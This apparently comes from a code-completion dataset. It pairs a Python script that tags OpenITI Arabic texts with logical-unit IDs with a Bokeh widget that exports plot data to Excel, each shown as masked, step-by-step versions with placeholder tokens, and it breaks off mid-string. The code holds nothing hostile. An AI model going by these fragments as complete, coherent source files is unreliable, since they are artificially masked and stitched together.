word_len = len(str(len(data)))
data_len = len(data)
for i in range(0, data_len):
if "\n#" in data[i]:
if "Page" in data[i + 1]:# or ar_token_cnt(ar_ra, data[i + 1]) <= 0:
new_data.append(data[i])
else:
last = data[i].rfind("#")
token_cnt_str = str(token_count + 1)
if len(token_cnt_str) < word_len:
tmp_cnt = token_cnt_str.zfill(word_len)
else:
tmp_cnt = token_cnt_str
tmp = data[i][:last] + "#" + tmp_cnt + data[i][last:]
new_data.append(tmp)
elif ar_token_cnt(ar_ra, data[i]):
token_count += 1
new_data.append(data[i])
else:
new_data.append(data[i])
log_text = "".join(new_data)
log_text = head + splitter + log_text
with open(file + "_logical", "w", encoding="utf8") as f:
f.write(log_text)
else:
print("The file is missing the splitter!")
print(file)
def ar_token_cnt(ar_ra, text):
return sum(ar_ra.search(t) is not None for t in re.findall(r"\w+|\W+", text))
# process all texts in OpenITI
def process_all(folder):
exclude = (["OpenITI.github.io", "Annotation", "_maintenance", "i.mech"])
for root, dirs, files in os.walk(folder):
# print("root: ",root)
dirs[:] = [d for d in dirs if d not in exclude]
# print("dir: ",dirs)
for file in files:
if re.search("^\d{4}\w+\.\w+\.\w+-ara\d$", file):
logical_units(os.path.join(root, file))
# return
# input()
# /media/rostam/Seagate Backup Plus Drive
# process_all("/home/rostam/projs/KITAB/test")
# print("Done!")
|
normal
|
{
"blob_id": "5c001303962315afe2512eb307376f6f7a883cf9",
"index": 6831,
"step-1": "<mask token>\n\n\ndef process_all(folder):\n exclude = ['OpenITI.github.io', 'Annotation', '_maintenance', 'i.mech']\n for root, dirs, files in os.walk(folder):\n dirs[:] = [d for d in dirs if d not in exclude]\n for file in files:\n if re.search('^\\\\d{4}\\\\w+\\\\.\\\\w+\\\\.\\\\w+-ara\\\\d$', file):\n logical_units(os.path.join(root, file))\n",
"step-2": "<mask token>\n\n\ndef logical_units(file):\n ar_ra = re.compile(\n '^[ذ١٢٣٤٥٦٧٨٩٠ّـضصثقفغعهخحجدًٌَُلإإشسيبلاتنمكطٍِلأأـئءؤرلاىةوزظْلآآ]+$'\n )\n with open(file, 'r', encoding='utf8') as f1:\n book = f1.read()\n if splitter in book:\n log_ids = re.findall('\\n#\\\\d+#', book)\n if len(log_ids) > 0:\n print(\n '\\tthe text already have %d logical units of this length' %\n len(log_ids))\n pass\n else:\n new_data = []\n head = book.split(splitter)[0]\n text = book.split(splitter)[1]\n token_count = 0\n data = re.findall('\\\\w+|\\\\W+', text)\n word_len = len(str(len(data)))\n data_len = len(data)\n for i in range(0, data_len):\n if '\\n#' in data[i]:\n if 'Page' in data[i + 1]:\n new_data.append(data[i])\n else:\n last = data[i].rfind('#')\n token_cnt_str = str(token_count + 1)\n if len(token_cnt_str) < word_len:\n tmp_cnt = token_cnt_str.zfill(word_len)\n else:\n tmp_cnt = token_cnt_str\n tmp = data[i][:last] + '#' + tmp_cnt + data[i][last\n :]\n new_data.append(tmp)\n elif ar_token_cnt(ar_ra, data[i]):\n token_count += 1\n new_data.append(data[i])\n else:\n new_data.append(data[i])\n log_text = ''.join(new_data)\n log_text = head + splitter + log_text\n with open(file + '_logical', 'w', encoding='utf8') as f:\n f.write(log_text)\n else:\n print('The file is missing the splitter!')\n print(file)\n\n\ndef ar_token_cnt(ar_ra, text):\n return sum(ar_ra.search(t) is not None for t in re.findall('\\\\w+|\\\\W+',\n text))\n\n\ndef process_all(folder):\n exclude = ['OpenITI.github.io', 'Annotation', '_maintenance', 'i.mech']\n for root, dirs, files in os.walk(folder):\n dirs[:] = [d for d in dirs if d not in exclude]\n for file in files:\n if re.search('^\\\\d{4}\\\\w+\\\\.\\\\w+\\\\.\\\\w+-ara\\\\d$', file):\n logical_units(os.path.join(root, file))\n",
"step-3": "<mask token>\nsplitter = '#META#Header#End#'\n\n\ndef logical_units(file):\n ar_ra = re.compile(\n '^[ذ١٢٣٤٥٦٧٨٩٠ّـضصثقفغعهخحجدًٌَُلإإشسيبلاتنمكطٍِلأأـئءؤرلاىةوزظْلآآ]+$'\n )\n with open(file, 'r', encoding='utf8') as f1:\n book = f1.read()\n if splitter in book:\n log_ids = re.findall('\\n#\\\\d+#', book)\n if len(log_ids) > 0:\n print(\n '\\tthe text already have %d logical units of this length' %\n len(log_ids))\n pass\n else:\n new_data = []\n head = book.split(splitter)[0]\n text = book.split(splitter)[1]\n token_count = 0\n data = re.findall('\\\\w+|\\\\W+', text)\n word_len = len(str(len(data)))\n data_len = len(data)\n for i in range(0, data_len):\n if '\\n#' in data[i]:\n if 'Page' in data[i + 1]:\n new_data.append(data[i])\n else:\n last = data[i].rfind('#')\n token_cnt_str = str(token_count + 1)\n if len(token_cnt_str) < word_len:\n tmp_cnt = token_cnt_str.zfill(word_len)\n else:\n tmp_cnt = token_cnt_str\n tmp = data[i][:last] + '#' + tmp_cnt + data[i][last\n :]\n new_data.append(tmp)\n elif ar_token_cnt(ar_ra, data[i]):\n token_count += 1\n new_data.append(data[i])\n else:\n new_data.append(data[i])\n log_text = ''.join(new_data)\n log_text = head + splitter + log_text\n with open(file + '_logical', 'w', encoding='utf8') as f:\n f.write(log_text)\n else:\n print('The file is missing the splitter!')\n print(file)\n\n\ndef ar_token_cnt(ar_ra, text):\n return sum(ar_ra.search(t) is not None for t in re.findall('\\\\w+|\\\\W+',\n text))\n\n\ndef process_all(folder):\n exclude = ['OpenITI.github.io', 'Annotation', '_maintenance', 'i.mech']\n for root, dirs, files in os.walk(folder):\n dirs[:] = [d for d in dirs if d not in exclude]\n for file in files:\n if re.search('^\\\\d{4}\\\\w+\\\\.\\\\w+\\\\.\\\\w+-ara\\\\d$', file):\n logical_units(os.path.join(root, file))\n",
"step-4": "import re\nimport os\nsplitter = '#META#Header#End#'\n\n\ndef logical_units(file):\n ar_ra = re.compile(\n '^[ذ١٢٣٤٥٦٧٨٩٠ّـضصثقفغعهخحجدًٌَُلإإشسيبلاتنمكطٍِلأأـئءؤرلاىةوزظْلآآ]+$'\n )\n with open(file, 'r', encoding='utf8') as f1:\n book = f1.read()\n if splitter in book:\n log_ids = re.findall('\\n#\\\\d+#', book)\n if len(log_ids) > 0:\n print(\n '\\tthe text already have %d logical units of this length' %\n len(log_ids))\n pass\n else:\n new_data = []\n head = book.split(splitter)[0]\n text = book.split(splitter)[1]\n token_count = 0\n data = re.findall('\\\\w+|\\\\W+', text)\n word_len = len(str(len(data)))\n data_len = len(data)\n for i in range(0, data_len):\n if '\\n#' in data[i]:\n if 'Page' in data[i + 1]:\n new_data.append(data[i])\n else:\n last = data[i].rfind('#')\n token_cnt_str = str(token_count + 1)\n if len(token_cnt_str) < word_len:\n tmp_cnt = token_cnt_str.zfill(word_len)\n else:\n tmp_cnt = token_cnt_str\n tmp = data[i][:last] + '#' + tmp_cnt + data[i][last\n :]\n new_data.append(tmp)\n elif ar_token_cnt(ar_ra, data[i]):\n token_count += 1\n new_data.append(data[i])\n else:\n new_data.append(data[i])\n log_text = ''.join(new_data)\n log_text = head + splitter + log_text\n with open(file + '_logical', 'w', encoding='utf8') as f:\n f.write(log_text)\n else:\n print('The file is missing the splitter!')\n print(file)\n\n\ndef ar_token_cnt(ar_ra, text):\n return sum(ar_ra.search(t) is not None for t in re.findall('\\\\w+|\\\\W+',\n text))\n\n\ndef process_all(folder):\n exclude = ['OpenITI.github.io', 'Annotation', '_maintenance', 'i.mech']\n for root, dirs, files in os.walk(folder):\n dirs[:] = [d for d in dirs if d not in exclude]\n for file in files:\n if re.search('^\\\\d{4}\\\\w+\\\\.\\\\w+\\\\.\\\\w+-ara\\\\d$', file):\n logical_units(os.path.join(root, file))\n",
"step-5": "# inserting logical unit ids for splitting texts into logical chunks\n\nimport re\nimport os\n\nsplitter = \"#META#Header#End#\"\n\n\ndef logical_units(file):\n ar_ra = re.compile(\"^[ذ١٢٣٤٥٦٧٨٩٠ّـضصثقفغعهخحجدًٌَُلإإشسيبلاتنمكطٍِلأأـئءؤرلاىةوزظْلآآ]+$\")\n\n with open(file, \"r\", encoding=\"utf8\") as f1:\n book = f1.read()\n\n # splitter test\n if splitter in book:\n # logical units\n log_ids = re.findall(\"\\n#\\d+#\", book)\n if len(log_ids) > 0:\n print(\"\\tthe text already have %d logical units of this length\" % len(log_ids))\n pass\n else:\n # insert logical unit ids\n new_data = []\n head = book.split(splitter)[0]\n text = book.split(splitter)[1]\n token_count = 0\n\n data = re.findall(r\"\\w+|\\W+\", text)\n word_len = len(str(len(data)))\n data_len = len(data)\n\n for i in range(0, data_len):\n if \"\\n#\" in data[i]:\n if \"Page\" in data[i + 1]:# or ar_token_cnt(ar_ra, data[i + 1]) <= 0:\n new_data.append(data[i])\n else:\n last = data[i].rfind(\"#\")\n token_cnt_str = str(token_count + 1)\n if len(token_cnt_str) < word_len:\n tmp_cnt = token_cnt_str.zfill(word_len)\n else:\n tmp_cnt = token_cnt_str\n tmp = data[i][:last] + \"#\" + tmp_cnt + data[i][last:]\n new_data.append(tmp)\n\n elif ar_token_cnt(ar_ra, data[i]):\n token_count += 1\n new_data.append(data[i])\n else:\n new_data.append(data[i])\n\n log_text = \"\".join(new_data)\n log_text = head + splitter + log_text\n\n with open(file + \"_logical\", \"w\", encoding=\"utf8\") as f:\n f.write(log_text)\n\n else:\n print(\"The file is missing the splitter!\")\n print(file)\n\n\ndef ar_token_cnt(ar_ra, text):\n return sum(ar_ra.search(t) is not None for t in re.findall(r\"\\w+|\\W+\", text))\n\n\n# process all texts in OpenITI\n\n\ndef process_all(folder):\n exclude = ([\"OpenITI.github.io\", \"Annotation\", \"_maintenance\", \"i.mech\"])\n for root, dirs, files in os.walk(folder):\n # print(\"root: \",root)\n dirs[:] = [d for d in dirs if d not in exclude]\n # print(\"dir: \",dirs)\n for file in files:\n if re.search(\"^\\d{4}\\w+\\.\\w+\\.\\w+-ara\\d$\", file):\n logical_units(os.path.join(root, file))\n # return\n # input()\n\n\n# /media/rostam/Seagate Backup Plus Drive\n# process_all(\"/home/rostam/projs/KITAB/test\")\n\n# print(\"Done!\")\n",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
class CSVExporter:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def reset(self, *_):
"""reset all"""
@staticmethod
async def _run(dlg: SaveFileDialog, mainview, ctrl, doc):
paths = await mainview.threadmethod(dlg.save)
if paths is None:
return
@doc.add_next_tick_callback
def _toolbarsave():
with ctrl.action:
dlg.store(paths, False)
path = paths if isinstance(paths, (str, Path)) else paths[0]
if mainview.export(path) and Path(path).exists():
startfile(path)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class SaveFileDialog(FileDialog):
<|reserved_special_token_0|>
def __init__(self, ctrl):
super().__init__(ctrl, storage='save')
def _defaultpath(ext, bopen):
assert not bopen
pot = [i for i in self.storedpaths(ctrl, 'load', ext) if i.exists()
]
ope = next((i for i in pot if i.suffix not in ('', '.gr')), None)
if ope is None:
ope = self.firstexistingpath(pot)
pot = self.storedpaths(ctrl, 'save', ext)
sav = self.firstexistingparent(pot)
if ope is None:
return sav
if sav is None:
if Path(ope).is_dir():
return ope
sav = Path(ope).with_suffix(ext[0][1])
else:
psa = Path(sav)
if psa.suffix == '':
sav = (psa / Path(ope).stem).with_suffix(ext[0][1])
else:
sav = (psa.parent / Path(ope).stem).with_suffix(psa.suffix)
self.defaultextension = sav.suffix[1:
] if sav.suffix != '' else None
return str(sav)
self.__store = self.access[1]
self.access = _defaultpath, None
self.filetypes = 'xlsx:*.xlsx'
self.title = 'Export plot data to excel'
def store(self, *_):
"""store the path"""
return self.__store(*_)
class CSVExporter:
"""exports all to csv"""
@classmethod
def addtodoc(cls, mainviews, ctrl, doc) ->List[Div]:
"""creates the widget"""
dlg = SaveFileDialog(ctrl)
div = Div(text='', width=0, height=0)
mainview = mainviews[0] if isinstance(mainviews, (list, tuple)
) else mainviews
figure = mainview.getfigure()
figure.tools = figure.tools + [CustomAction(action_tooltip=dlg.
title, callback=CustomJS(code='div.text = div.text + " ";',
args=dict(div=div)))]
if isinstance(mainviews, (list, tuple)):
for i in mainviews[1:]:
i.getfigure().tools = i.getfigure().tools + [figure.tools[-1]]
def _cb(attr, old, new):
if new == ' ' and div.text == ' ':
div.text = ''
asyncio.create_task(cls._run(dlg, mainview, ctrl, doc))
div.on_change('text', _cb)
return [div]
def reset(self, *_):
"""reset all"""
@staticmethod
async def _run(dlg: SaveFileDialog, mainview, ctrl, doc):
paths = await mainview.threadmethod(dlg.save)
if paths is None:
return
@doc.add_next_tick_callback
def _toolbarsave():
with ctrl.action:
dlg.store(paths, False)
path = paths if isinstance(paths, (str, Path)) else paths[0]
if mainview.export(path) and Path(path).exists():
startfile(path)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class SaveFileDialog(FileDialog):
"""A file dialog that adds a default save path"""
def __init__(self, ctrl):
super().__init__(ctrl, storage='save')
def _defaultpath(ext, bopen):
assert not bopen
pot = [i for i in self.storedpaths(ctrl, 'load', ext) if i.exists()
]
ope = next((i for i in pot if i.suffix not in ('', '.gr')), None)
if ope is None:
ope = self.firstexistingpath(pot)
pot = self.storedpaths(ctrl, 'save', ext)
sav = self.firstexistingparent(pot)
if ope is None:
return sav
if sav is None:
if Path(ope).is_dir():
return ope
sav = Path(ope).with_suffix(ext[0][1])
else:
psa = Path(sav)
if psa.suffix == '':
sav = (psa / Path(ope).stem).with_suffix(ext[0][1])
else:
sav = (psa.parent / Path(ope).stem).with_suffix(psa.suffix)
self.defaultextension = sav.suffix[1:
] if sav.suffix != '' else None
return str(sav)
self.__store = self.access[1]
self.access = _defaultpath, None
self.filetypes = 'xlsx:*.xlsx'
self.title = 'Export plot data to excel'
def store(self, *_):
"""store the path"""
return self.__store(*_)
class CSVExporter:
"""exports all to csv"""
@classmethod
def addtodoc(cls, mainviews, ctrl, doc) ->List[Div]:
"""creates the widget"""
dlg = SaveFileDialog(ctrl)
div = Div(text='', width=0, height=0)
mainview = mainviews[0] if isinstance(mainviews, (list, tuple)
) else mainviews
figure = mainview.getfigure()
figure.tools = figure.tools + [CustomAction(action_tooltip=dlg.
title, callback=CustomJS(code='div.text = div.text + " ";',
args=dict(div=div)))]
if isinstance(mainviews, (list, tuple)):
for i in mainviews[1:]:
i.getfigure().tools = i.getfigure().tools + [figure.tools[-1]]
def _cb(attr, old, new):
if new == ' ' and div.text == ' ':
div.text = ''
asyncio.create_task(cls._run(dlg, mainview, ctrl, doc))
div.on_change('text', _cb)
return [div]
def reset(self, *_):
"""reset all"""
@staticmethod
async def _run(dlg: SaveFileDialog, mainview, ctrl, doc):
paths = await mainview.threadmethod(dlg.save)
if paths is None:
return
@doc.add_next_tick_callback
def _toolbarsave():
with ctrl.action:
dlg.store(paths, False)
path = paths if isinstance(paths, (str, Path)) else paths[0]
if mainview.export(path) and Path(path).exists():
startfile(path)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import asyncio
from pathlib import Path
from typing import List
from bokeh.models import Div, CustomAction, CustomJS
from view.dialog import FileDialog
from utils.gui import startfile
class SaveFileDialog(FileDialog):
"""A file dialog that adds a default save path"""
def __init__(self, ctrl):
super().__init__(ctrl, storage='save')
def _defaultpath(ext, bopen):
assert not bopen
pot = [i for i in self.storedpaths(ctrl, 'load', ext) if i.exists()
]
ope = next((i for i in pot if i.suffix not in ('', '.gr')), None)
if ope is None:
ope = self.firstexistingpath(pot)
pot = self.storedpaths(ctrl, 'save', ext)
sav = self.firstexistingparent(pot)
if ope is None:
return sav
if sav is None:
if Path(ope).is_dir():
return ope
sav = Path(ope).with_suffix(ext[0][1])
else:
psa = Path(sav)
if psa.suffix == '':
sav = (psa / Path(ope).stem).with_suffix(ext[0][1])
else:
sav = (psa.parent / Path(ope).stem).with_suffix(psa.suffix)
self.defaultextension = sav.suffix[1:
] if sav.suffix != '' else None
return str(sav)
self.__store = self.access[1]
self.access = _defaultpath, None
self.filetypes = 'xlsx:*.xlsx'
self.title = 'Export plot data to excel'
def store(self, *_):
"""store the path"""
return self.__store(*_)
class CSVExporter:
"""exports all to csv"""
@classmethod
def addtodoc(cls, mainviews, ctrl, doc) ->List[Div]:
"""creates the widget"""
dlg = SaveFileDialog(ctrl)
div = Div(text='', width=0, height=0)
mainview = mainviews[0] if isinstance(mainviews, (list, tuple)
) else mainviews
figure = mainview.getfigure()
figure.tools = figure.tools + [CustomAction(action_tooltip=dlg.
title, callback=CustomJS(code='div.text = div.text + " ";',
args=dict(div=div)))]
if isinstance(mainviews, (list, tuple)):
for i in mainviews[1:]:
i.getfigure().tools = i.getfigure().tools + [figure.tools[-1]]
def _cb(attr, old, new):
if new == ' ' and div.text == ' ':
div.text = ''
asyncio.create_task(cls._run(dlg, mainview, ctrl, doc))
div.on_change('text', _cb)
return [div]
def reset(self, *_):
"""reset all"""
@staticmethod
async def _run(dlg: SaveFileDialog, mainview, ctrl, doc):
paths = await mainview.threadmethod(dlg.save)
if paths is None:
return
@doc.add_next_tick_callback
def _toolbarsave():
with ctrl.action:
dlg.store(paths, False)
path = paths if isinstance(paths, (str, Path)) else paths[0]
if mainview.export(path) and Path(path).exists():
startfile(path)
<|reserved_special_token_1|>
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"Widget for exporting the data"
import asyncio
from pathlib import Path
from typing import List
from bokeh.models import Div, CustomAction, CustomJS
from view.dialog import FileDialog
from utils.gui import startfile
class SaveFileDialog(FileDialog):
"A file dialog that adds a default save path"
def __init__(self, ctrl):
super().__init__(ctrl, storage = "save")
def _defaultpath(ext, bopen):
assert not bopen
pot = [i for i in self.storedpaths(ctrl, "load", ext) if i.exists()]
ope = next((i for i in pot if i.suffix not in ('', '.gr')), None)
if ope is None:
ope = self.firstexistingpath(pot)
pot = self.storedpaths(ctrl, "save", ext)
sav = self.firstexistingparent(pot)
if ope is None:
return sav
if sav is None:
if Path(ope).is_dir():
return ope
sav = Path(ope).with_suffix(ext[0][1])
else:
psa = Path(sav)
if psa.suffix == '':
sav = (psa/Path(ope).stem).with_suffix(ext[0][1])
else:
sav = (psa.parent/Path(ope).stem).with_suffix(psa.suffix)
self.defaultextension = sav.suffix[1:] if sav.suffix != '' else None
return str(sav)
self.__store = self.access[1]
self.access = _defaultpath, None
self.filetypes = "xlsx:*.xlsx"
self.title = "Export plot data to excel"
def store(self, *_):
"store the path"
return self.__store(*_)
class CSVExporter:
"exports all to csv"
@classmethod
def addtodoc(cls, mainviews, ctrl, doc) -> List[Div]:
"creates the widget"
dlg = SaveFileDialog(ctrl)
div = Div(text = "", width = 0, height = 0)
mainview = mainviews[0] if isinstance(mainviews, (list, tuple)) else mainviews
figure = mainview.getfigure()
figure.tools = (
figure.tools
+ [
CustomAction(
action_tooltip = dlg.title,
callback = CustomJS(
code = 'div.text = div.text + " ";',
args = dict(div = div)
)
)
]
)
if isinstance(mainviews, (list, tuple)):
for i in mainviews[1:]:
i.getfigure().tools = i.getfigure().tools + [figure.tools[-1]]
def _cb(attr, old, new):
if new == " " and div.text == ' ':
div.text = ""
asyncio.create_task(cls._run(dlg, mainview, ctrl, doc))
div.on_change("text", _cb)
return [div]
def reset(self, *_):
"reset all"
@staticmethod
async def _run(dlg: SaveFileDialog, mainview, ctrl, doc):
paths = await mainview.threadmethod(dlg.save)
if paths is None:
return
@doc.add_next_tick_callback
def _toolbarsave():
with ctrl.action:
dlg.store(paths, False) # pylint: disable=not-callable
path = paths if isinstance(paths, (str, Path)) else paths[0]
if mainview.export(path) and Path(path).exists():
startfile(path)
|
flexible
|
{
"blob_id": "d120172e65f329b1137df38b693e5fe7145bc80d",
"index": 2840,
"step-1": "<mask token>\n\n\nclass CSVExporter:\n <mask token>\n <mask token>\n\n def reset(self, *_):\n \"\"\"reset all\"\"\"\n\n @staticmethod\n async def _run(dlg: SaveFileDialog, mainview, ctrl, doc):\n paths = await mainview.threadmethod(dlg.save)\n if paths is None:\n return\n\n @doc.add_next_tick_callback\n def _toolbarsave():\n with ctrl.action:\n dlg.store(paths, False)\n path = paths if isinstance(paths, (str, Path)) else paths[0]\n if mainview.export(path) and Path(path).exists():\n startfile(path)\n",
"step-2": "<mask token>\n\n\nclass SaveFileDialog(FileDialog):\n <mask token>\n\n def __init__(self, ctrl):\n super().__init__(ctrl, storage='save')\n\n def _defaultpath(ext, bopen):\n assert not bopen\n pot = [i for i in self.storedpaths(ctrl, 'load', ext) if i.exists()\n ]\n ope = next((i for i in pot if i.suffix not in ('', '.gr')), None)\n if ope is None:\n ope = self.firstexistingpath(pot)\n pot = self.storedpaths(ctrl, 'save', ext)\n sav = self.firstexistingparent(pot)\n if ope is None:\n return sav\n if sav is None:\n if Path(ope).is_dir():\n return ope\n sav = Path(ope).with_suffix(ext[0][1])\n else:\n psa = Path(sav)\n if psa.suffix == '':\n sav = (psa / Path(ope).stem).with_suffix(ext[0][1])\n else:\n sav = (psa.parent / Path(ope).stem).with_suffix(psa.suffix)\n self.defaultextension = sav.suffix[1:\n ] if sav.suffix != '' else None\n return str(sav)\n self.__store = self.access[1]\n self.access = _defaultpath, None\n self.filetypes = 'xlsx:*.xlsx'\n self.title = 'Export plot data to excel'\n\n def store(self, *_):\n \"\"\"store the path\"\"\"\n return self.__store(*_)\n\n\nclass CSVExporter:\n \"\"\"exports all to csv\"\"\"\n\n @classmethod\n def addtodoc(cls, mainviews, ctrl, doc) ->List[Div]:\n \"\"\"creates the widget\"\"\"\n dlg = SaveFileDialog(ctrl)\n div = Div(text='', width=0, height=0)\n mainview = mainviews[0] if isinstance(mainviews, (list, tuple)\n ) else mainviews\n figure = mainview.getfigure()\n figure.tools = figure.tools + [CustomAction(action_tooltip=dlg.\n title, callback=CustomJS(code='div.text = div.text + \" \";',\n args=dict(div=div)))]\n if isinstance(mainviews, (list, tuple)):\n for i in mainviews[1:]:\n i.getfigure().tools = i.getfigure().tools + [figure.tools[-1]]\n\n def _cb(attr, old, new):\n if new == ' ' and div.text == ' ':\n div.text = ''\n asyncio.create_task(cls._run(dlg, mainview, ctrl, doc))\n div.on_change('text', _cb)\n return [div]\n\n def reset(self, *_):\n \"\"\"reset all\"\"\"\n\n @staticmethod\n async def _run(dlg: SaveFileDialog, mainview, ctrl, doc):\n paths = await mainview.threadmethod(dlg.save)\n if paths is None:\n return\n\n @doc.add_next_tick_callback\n def _toolbarsave():\n with ctrl.action:\n dlg.store(paths, False)\n path = paths if isinstance(paths, (str, Path)) else paths[0]\n if mainview.export(path) and Path(path).exists():\n startfile(path)\n",
"step-3": "<mask token>\n\n\nclass SaveFileDialog(FileDialog):\n \"\"\"A file dialog that adds a default save path\"\"\"\n\n def __init__(self, ctrl):\n super().__init__(ctrl, storage='save')\n\n def _defaultpath(ext, bopen):\n assert not bopen\n pot = [i for i in self.storedpaths(ctrl, 'load', ext) if i.exists()\n ]\n ope = next((i for i in pot if i.suffix not in ('', '.gr')), None)\n if ope is None:\n ope = self.firstexistingpath(pot)\n pot = self.storedpaths(ctrl, 'save', ext)\n sav = self.firstexistingparent(pot)\n if ope is None:\n return sav\n if sav is None:\n if Path(ope).is_dir():\n return ope\n sav = Path(ope).with_suffix(ext[0][1])\n else:\n psa = Path(sav)\n if psa.suffix == '':\n sav = (psa / Path(ope).stem).with_suffix(ext[0][1])\n else:\n sav = (psa.parent / Path(ope).stem).with_suffix(psa.suffix)\n self.defaultextension = sav.suffix[1:\n ] if sav.suffix != '' else None\n return str(sav)\n self.__store = self.access[1]\n self.access = _defaultpath, None\n self.filetypes = 'xlsx:*.xlsx'\n self.title = 'Export plot data to excel'\n\n def store(self, *_):\n \"\"\"store the path\"\"\"\n return self.__store(*_)\n\n\nclass CSVExporter:\n \"\"\"exports all to csv\"\"\"\n\n @classmethod\n def addtodoc(cls, mainviews, ctrl, doc) ->List[Div]:\n \"\"\"creates the widget\"\"\"\n dlg = SaveFileDialog(ctrl)\n div = Div(text='', width=0, height=0)\n mainview = mainviews[0] if isinstance(mainviews, (list, tuple)\n ) else mainviews\n figure = mainview.getfigure()\n figure.tools = figure.tools + [CustomAction(action_tooltip=dlg.\n title, callback=CustomJS(code='div.text = div.text + \" \";',\n args=dict(div=div)))]\n if isinstance(mainviews, (list, tuple)):\n for i in mainviews[1:]:\n i.getfigure().tools = i.getfigure().tools + [figure.tools[-1]]\n\n def _cb(attr, old, new):\n if new == ' ' and div.text == ' ':\n div.text = ''\n asyncio.create_task(cls._run(dlg, mainview, ctrl, doc))\n div.on_change('text', _cb)\n return [div]\n\n def reset(self, *_):\n \"\"\"reset all\"\"\"\n\n @staticmethod\n async def _run(dlg: SaveFileDialog, mainview, ctrl, doc):\n paths = await mainview.threadmethod(dlg.save)\n if paths is None:\n return\n\n @doc.add_next_tick_callback\n def _toolbarsave():\n with ctrl.action:\n dlg.store(paths, False)\n path = paths if isinstance(paths, (str, Path)) else paths[0]\n if mainview.export(path) and Path(path).exists():\n startfile(path)\n",
"step-4": "<mask token>\nimport asyncio\nfrom pathlib import Path\nfrom typing import List\nfrom bokeh.models import Div, CustomAction, CustomJS\nfrom view.dialog import FileDialog\nfrom utils.gui import startfile\n\n\nclass SaveFileDialog(FileDialog):\n \"\"\"A file dialog that adds a default save path\"\"\"\n\n def __init__(self, ctrl):\n super().__init__(ctrl, storage='save')\n\n def _defaultpath(ext, bopen):\n assert not bopen\n pot = [i for i in self.storedpaths(ctrl, 'load', ext) if i.exists()\n ]\n ope = next((i for i in pot if i.suffix not in ('', '.gr')), None)\n if ope is None:\n ope = self.firstexistingpath(pot)\n pot = self.storedpaths(ctrl, 'save', ext)\n sav = self.firstexistingparent(pot)\n if ope is None:\n return sav\n if sav is None:\n if Path(ope).is_dir():\n return ope\n sav = Path(ope).with_suffix(ext[0][1])\n else:\n psa = Path(sav)\n if psa.suffix == '':\n sav = (psa / Path(ope).stem).with_suffix(ext[0][1])\n else:\n sav = (psa.parent / Path(ope).stem).with_suffix(psa.suffix)\n self.defaultextension = sav.suffix[1:\n ] if sav.suffix != '' else None\n return str(sav)\n self.__store = self.access[1]\n self.access = _defaultpath, None\n self.filetypes = 'xlsx:*.xlsx'\n self.title = 'Export plot data to excel'\n\n def store(self, *_):\n \"\"\"store the path\"\"\"\n return self.__store(*_)\n\n\nclass CSVExporter:\n \"\"\"exports all to csv\"\"\"\n\n @classmethod\n def addtodoc(cls, mainviews, ctrl, doc) ->List[Div]:\n \"\"\"creates the widget\"\"\"\n dlg = SaveFileDialog(ctrl)\n div = Div(text='', width=0, height=0)\n mainview = mainviews[0] if isinstance(mainviews, (list, tuple)\n ) else mainviews\n figure = mainview.getfigure()\n figure.tools = figure.tools + [CustomAction(action_tooltip=dlg.\n title, callback=CustomJS(code='div.text = div.text + \" \";',\n args=dict(div=div)))]\n if isinstance(mainviews, (list, tuple)):\n for i in mainviews[1:]:\n i.getfigure().tools = i.getfigure().tools + [figure.tools[-1]]\n\n def _cb(attr, old, new):\n if new == ' ' and div.text == ' ':\n div.text = ''\n asyncio.create_task(cls._run(dlg, mainview, ctrl, doc))\n div.on_change('text', _cb)\n return [div]\n\n def reset(self, *_):\n \"\"\"reset all\"\"\"\n\n @staticmethod\n async def _run(dlg: SaveFileDialog, mainview, ctrl, doc):\n paths = await mainview.threadmethod(dlg.save)\n if paths is None:\n return\n\n @doc.add_next_tick_callback\n def _toolbarsave():\n with ctrl.action:\n dlg.store(paths, False)\n path = paths if isinstance(paths, (str, Path)) else paths[0]\n if mainview.export(path) and Path(path).exists():\n startfile(path)\n",
"step-5": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"Widget for exporting the data\"\nimport asyncio\nfrom pathlib import Path\nfrom typing import List\nfrom bokeh.models import Div, CustomAction, CustomJS\nfrom view.dialog import FileDialog\nfrom utils.gui import startfile\n\nclass SaveFileDialog(FileDialog):\n \"A file dialog that adds a default save path\"\n def __init__(self, ctrl):\n super().__init__(ctrl, storage = \"save\")\n\n def _defaultpath(ext, bopen):\n assert not bopen\n pot = [i for i in self.storedpaths(ctrl, \"load\", ext) if i.exists()]\n ope = next((i for i in pot if i.suffix not in ('', '.gr')), None)\n if ope is None:\n ope = self.firstexistingpath(pot)\n\n pot = self.storedpaths(ctrl, \"save\", ext)\n sav = self.firstexistingparent(pot)\n\n if ope is None:\n return sav\n\n if sav is None:\n if Path(ope).is_dir():\n return ope\n sav = Path(ope).with_suffix(ext[0][1])\n else:\n psa = Path(sav)\n if psa.suffix == '':\n sav = (psa/Path(ope).stem).with_suffix(ext[0][1])\n else:\n sav = (psa.parent/Path(ope).stem).with_suffix(psa.suffix)\n\n self.defaultextension = sav.suffix[1:] if sav.suffix != '' else None\n return str(sav)\n\n self.__store = self.access[1]\n self.access = _defaultpath, None\n self.filetypes = \"xlsx:*.xlsx\"\n self.title = \"Export plot data to excel\"\n\n def store(self, *_):\n \"store the path\"\n return self.__store(*_)\n\nclass CSVExporter:\n \"exports all to csv\"\n @classmethod\n def addtodoc(cls, mainviews, ctrl, doc) -> List[Div]:\n \"creates the widget\"\n dlg = SaveFileDialog(ctrl)\n div = Div(text = \"\", width = 0, height = 0)\n\n mainview = mainviews[0] if isinstance(mainviews, (list, tuple)) else mainviews\n figure = mainview.getfigure()\n\n figure.tools = (\n figure.tools\n + [\n CustomAction(\n action_tooltip = dlg.title,\n callback = CustomJS(\n code = 'div.text = div.text + \" \";',\n args = dict(div = div)\n )\n )\n ]\n )\n\n if isinstance(mainviews, (list, tuple)):\n for i in mainviews[1:]:\n i.getfigure().tools = i.getfigure().tools + [figure.tools[-1]]\n\n def _cb(attr, old, new):\n if new == \" \" and div.text == ' ':\n div.text = \"\"\n asyncio.create_task(cls._run(dlg, mainview, ctrl, doc))\n\n div.on_change(\"text\", _cb)\n return [div]\n\n def reset(self, *_):\n \"reset all\"\n\n @staticmethod\n 